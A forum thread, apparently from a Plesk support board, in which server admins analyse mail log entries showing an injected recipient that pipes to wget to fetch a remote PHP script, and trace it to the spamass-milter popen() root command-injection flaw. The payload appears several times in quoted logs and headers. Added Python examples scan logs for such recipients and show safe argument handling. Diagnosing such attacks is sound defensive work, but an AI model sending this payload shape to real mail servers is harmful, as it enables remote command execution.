
Is this a new hack?

Ritey (Guest)
Hi,

My Plesk has "reject" set on all mail domains. Yet today I received two bounces, so I looked at the mail log,
/usr/local/psa/log/maillog, and found some strange entries...

Apr 11 15:15:21 plesk /var/qmail/bin/relaylock[7933]: /var/qmail/bin/relaylock: mail from 85.92.138.149:49771 (hosted.by.pcextreme)
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: Handlers Filter before-queue for qmail started ...
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: [email protected]
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: to=root+:|wget http://xfortunes.in/x1x.php
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: hook_dir = '/usr/local/psa/handlers/before-queue'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: call executable = '/usr/local/psa/handlers/info/05-grey-qMrEAh/executable'
Apr 11 15:15:21 plesk greylisting filter[7937]: Starting greylisting filter...
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable get domain name by e-mail address root+:|wget http://xfortunes.in/x1x.php: Success
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable to get GL trio status
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable to check message
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: Error during call '/usr/local/psa/handlers/info/05-grey-qMrEAh/executable' handler
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: LOG Internal error in handler '05-grey-qMrEAh'. Skip handler.
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: call executable = '/usr/local/psa/handlers/info/10-spf-ixyyCD/executable'
Apr 11 15:15:21 plesk spf filter[7938]: Starting spf filter...
Apr 11 15:15:21 plesk spf filter[7938]: Error code: (2) Could not find a valid SPF record
Apr 11 15:15:21 plesk spf filter[7938]: Failed to query MAIL-FROM: No DNS data for 'dick.com'.
Apr 11 15:15:21 plesk spf filter[7938]: SPF result: none
Apr 11 15:15:21 plesk spf filter[7938]: SPF status: PASS
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: handlers_stderr: PASS
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: PASS during call '/usr/local/psa/handlers/info/10-spf-ixyyCD/executable' handler
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: recipient[3] = 'root+:|wget http://xfortunes.in/x1x.php'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: handlers dir = '/usr/local/psa/handlers/before-queue/recipient/root+:|wget http://xfortunes.in/x1x.php'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: starter: submitter[7939] exited normally
Apr 11 15:15:21 plesk qmail: 1270995321.460367 new msg 403377118
Apr 11 15:15:21 plesk qmail: 1270995321.460422 info msg 403377118: bytes 236 from <[email protected]> qp 7939 uid 2020
Apr 11 15:15:21 plesk qmail: 1270995321.467336 starting delivery 879: msg 403377118 to local root+:|wget_http://xfortunes.in/x1x.php@plesk.DOMAIN.net
Apr 11 15:15:21 plesk qmail: 1270995321.467372 status: local 1/10 remote 0/20

I replaced my real domain with DOMAIN.
I also added an x to the beginning of the URLs as I don't want anyone to go to that site by mistake!

As you can see, the recipient contains a wget... This to me is a little worrying!
And also, why did qmail decide to send a bounce?
And why was my Plesk domain name appended to the original recipient?

My Plesk is on the latest 9.3 version.

Can anyone shed some light on this please?
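The maillog excerpt above records the recipient in three places (the `to=` handler line, the `recipient[n] =` line, and qmail's `starting delivery ... to local` line). The following scanner, an added example that is not from this thread or from Plesk, pulls the recipient out of each of those line shapes and flags any that contain shell metacharacters such as `|` or `;`, which is the tell-tale of this kind of injected RCPT TO. The sample lines are constructed to match the poster's excerpt, with the poster's already-defanged `xfortunes.in` hostname, plus two ordinary deliveries for contrast; the regexes are my own assumptions about the log format shown, not a Plesk-documented schema.

```python
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the maillog excerpt in the post above,
# plus a normal delivery (alice@) so the scanner has something to ignore.
SAMPLE_MAILLOG = """\
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: to=root+:|wget http://xfortunes.in/x1x.php
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: recipient[3] = 'root+:|wget http://xfortunes.in/x1x.php'
Apr 11 15:15:21 plesk qmail: 1270995321.467336 starting delivery 879: msg 403377118 to local root+:|wget_http://xfortunes.in/x1x.php@plesk.DOMAIN.net
Apr 11 15:16:02 plesk qmail-queue-handlers[7950]: to=alice@plesk.DOMAIN.net
Apr 11 15:16:02 plesk qmail-queue-handlers[7950]: recipient[1] = 'alice@plesk.DOMAIN.net'
Apr 11 15:16:02 plesk qmail: 1270995362.100000 starting delivery 880: msg 403377120 to local alice@plesk.DOMAIN.net
"""

# Characters a shell would interpret and that never belong in a recipient:
# pipe, command separators, backticks, $ expansion, redirections, grouping.
SHELL_META = re.compile(r"[|;&`$<>(){}]")

# The three line shapes in which this log writes the recipient (assumed
# from the excerpt, not from any Plesk/qmail specification).
RECIPIENT_PATTERNS = [
    re.compile(r"qmail-queue-handlers\[\d+\]: to=(?P<rcpt>.+)$"),
    re.compile(r"qmail-queue-handlers\[\d+\]: recipient\[\d+\] = '(?P<rcpt>[^']*)'"),
    re.compile(r" qmail: \S+ starting delivery \d+: msg \d+ to local (?P<rcpt>\S+)$"),
]


def extract_recipient(line: str) -> Optional[str]:
    """Return the recipient written on this log line, or None if the line has none."""
    for pat in RECIPIENT_PATTERNS:
        m = pat.search(line)
        if m:
            return m.group("rcpt")
    return None


def is_suspicious_recipient(rcpt: str) -> bool:
    """True if the recipient contains a character a shell would act on."""
    return SHELL_META.search(rcpt) is not None


def scan_maillog(text: str) -> List[Dict[str, object]]:
    """Scan maillog text and report every line whose recipient looks injected."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rcpt = extract_recipient(line)
        if rcpt is None or not is_suspicious_recipient(rcpt):
            continue
        indicator = SHELL_META.search(rcpt).group(0)
        hits.append({"line": lineno, "recipient": rcpt, "indicator": indicator})
    return hits


if __name__ == "__main__":
    for hit in scan_maillog(SAMPLE_MAILLOG):
        print(f"line {hit['line']}: metachar {hit['indicator']!r} in recipient {hit['recipient']!r}")
```

Note that the `+` in `root+...` is not what the scanner keys on: plus-addressing (`user+tag`) is legitimate, and qmail's own `to local` line even rewrites the space to an underscore, so the pipe character is the stable indicator across all three line shapes. Run it over the real `/usr/local/psa/log/maillog` with `scan_maillog(open(path).read())`.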
 
It looks like your server is compromised. Did you try to check it with chkrootkit or rkhunter?
 
Thanks for your reply.

I did try to emulate the issue (but obviously using a safe URL that I can track), and found that the 'wget ...' in the recipient is not actually executed. So that is one thing to be grateful for!

But it does seem to create a bounce, though, which is a little worrying.

I have checked the box and it seems fine.

So the issue for me really is: how can I prevent ALL bounce mails?
 
I got the same mail. On a test machine I downloaded the x1x.php using wget. What I get is a text string "xxx".

Notes:
1. Three underscores in front of the "fortunes" domain.
2. Replaced the real hostname (actually it was my reverse DNS) with MY-REVERSE-DNS.
3. Seems I'm not compromised, but I'm investigating.
4. I'm not using Parallels. It's a Debian box with the latest patches applied.

From [email protected] Sat Apr 10 09:23:06 2010
Return-Path: <[email protected]>
X-Original-To: "root+:|wget http://___fortunes.in/x1x.php"
Delivered-To: "root+:|wget http://___fortunes.in/x1x.php"@MY-REVERSE-DNS
Received: from bluedick (unknown [208.88.6.50])
by MY-REVERSE-DNS (Postfix) with SMTP id 407DA54A0872
for <"root+:|wget http://___fortunes.in/x1x.php">; Sat, 10 Apr 2010 09:23:$
Message-Id: <20100410072306.407DA54A0872@MY-REVERSE-DNS>
Date: Sat, 10 Apr 2010 09:23:06 +0200 (CEST)
From: [email protected]
To: undisclosed-recipients:;
Status: RO
Content-Length: 0
Lines: 0
 
It could well be that the sender expects the bounce message to be read by a certain mail client or webmail, in which case it may render the recipient name as something clickable and, once clicked, could then trigger some other nasty stuff, such as vulnerabilities in mail/webmail clients.
 
Hi,
I found it. They try to exploit SpamAssassin's milter vulnerability.
Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
Spamassassin Milter Plugin Remote Root Attack
http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

Phew :) Good I fixed that already.
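The advisory quoted above says the milter, when run with `-x`, passes the attacker-supplied RCPT TO through `popen()`, i.e. through a shell. The following is an added example (not code from this thread, from spamass-milter or from Plesk) of the two defences a recipient-expansion step needs: validate the address against a strict allowlist before doing anything with it, and when a helper must be invoked, pass the address as a single argv element so no shell ever parses it. The helper command here is an assumed stand-in (the Python interpreter echoing its first argument) for whatever the real milter would call; the `handle_rcpt_to` function and its `REJECT`/`CONTINUE` results are likewise my own illustrative shape, not the milter API.

```python
import re
import subprocess
import sys
from typing import Tuple

# Conservative allowlist for an address we are willing to hand to any
# external program: letters, digits and . _ + - in the local part, so
# ordinary plus-addressing (user+tag) still works but no shell character
# (| ; & ` $ < > etc.) can get through.
LOCAL_PART_OK = re.compile(r"^[A-Za-z0-9._+-]{1,64}$")
DOMAIN_OK = re.compile(r"^[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})+$")


def recipient_is_safe(rcpt: str) -> bool:
    """True only for a plain local@domain built from the allowlisted characters."""
    if rcpt.count("@") != 1:
        return False
    local, domain = rcpt.split("@")
    return bool(LOCAL_PART_OK.match(local) and DOMAIN_OK.match(domain))


# Assumed stand-in for the expansion helper: prints its first argument back.
# The vulnerable shape the advisory describes is the C call
#     popen("helper " + rcpt, "r")          /* shell parses rcpt */
# whose Python equivalent would be subprocess.Popen(cmd_string, shell=True).
# Neither appears here; the argv form below is the replacement for both.
HELPER_ARGV = [sys.executable, "-c", "import sys; print(sys.argv[1])"]


def expand_recipient_argv(rcpt: str) -> str:
    """Hand rcpt to the helper as ONE argv element; no shell is involved."""
    result = subprocess.run(HELPER_ARGV + [rcpt], capture_output=True,
                            text=True, check=True)
    return result.stdout.rstrip("\n")


def handle_rcpt_to(rcpt: str) -> Tuple[str, str]:
    """Milter-style handling: refuse malformed recipients before any expansion."""
    if not recipient_is_safe(rcpt):
        return ("REJECT", f"malformed recipient {rcpt!r}")
    return ("CONTINUE", expand_recipient_argv(rcpt))


if __name__ == "__main__":
    # Constructed inputs: one ordinary plus-address and the payload shape
    # from the thread (using the poster's already-defanged hostname).
    for r in ("alice+tag@example.com", "root+:|wget http://xfortunes.in/x1x.php"):
        print(r, "->", handle_rcpt_to(r))
```

Even if validation were skipped, the argv form would deliver the whole string `root+:|wget http://...` to the helper as one literal argument; the pipe is never seen by a shell, which is exactly the property `popen()` on a concatenated string lacks. The allowlist is deliberately narrower than RFC 5322 permits (no quoted local parts, no `%` routing), which is the right trade-off for an address that is about to reach an external process.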
 
And the question is: does Plesk use this software embedded somewhere?
 
Well found, cepstrum.

How a plugin be to for it to make a such a possible. The author of it should.

But my original question is still as yet unanswered. Is it possible to stop ALL?

This little script hacker didn't get what he wanted, but he did manage to make a bounce where bounces shouldn't happen.

So it has exposed an issue in my thoughts, that needs fixing.
 